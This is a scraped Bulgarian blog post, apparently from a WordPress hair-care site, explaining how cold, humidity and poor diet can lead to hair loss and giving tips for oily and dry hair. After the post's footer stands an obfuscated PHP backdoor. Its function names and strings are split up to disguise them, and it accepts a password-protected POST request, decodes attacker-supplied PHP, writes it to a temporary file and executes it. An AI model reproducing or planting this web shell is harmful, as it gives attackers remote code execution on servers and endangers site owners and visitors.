Студът може да предизвика косопад | Косопад

Студът може да предизвика косопад

Високите нива на влажността и студът, също и лошото хранене, могат да причинят сериозни проблеми на косата ви, като се стигне дори до косопад. Студът изсушава косата, която трябва да е постоянно хидратирана, за да е блестяща и да има обем.

stud-kosa

Климатичните промени се отразяват на косата ни. През лятото топлото я изсушава, през зимата липсата на слънце и студът я правят да изглежда посърнала и без блясък, като започва да пада по- лесно.

Студът изисква косата да бъде обгрижвана постоянно, като има разлика дали е суха или мазна.

При мазната коса липсата на ежедневна хидратация и миене могат да увеличат мастните жлези, които улесняват появата на пърхот , лоша миризма и заболявания на скалпа, като се стига до косопад.

Мазната коса е заплашена от пърхот и дерматит, така че трябва изключително внимателно да избираме продуктите за нея. Не взимайте шампоани с високо съдържание на сол, сулфати и мазнини. Обикновено хора с такава коса не се хранят правилно, като наблягат на бързата храна.

kosopad-anemiya

При сухата коса трябва да се наблегне също на храненето и най- вече на хидратацията. Този тип коса трябва да се третира с продукти на основата на алое вера, масло от авокадо, бадемово масло. Те съдържат витамини А, Д и Е, магнезий, мед, желязо, аминокиселини, фолиева киселина.

СЪВЕТИ:

– Връзвайте косата, когато вали дъжд и духа вятър. Тези фактори я отслабват.
– Не излизайте от дома си с мокра или влажна коса.
– Когато у студено, задължително слагайте шапка, за да предпазите косата от климата
– Не мийте косата с гореща вода
– Не прекалявайте с пресата или сешоара.

25. юни 2014 13:33:50 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | 1 675 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}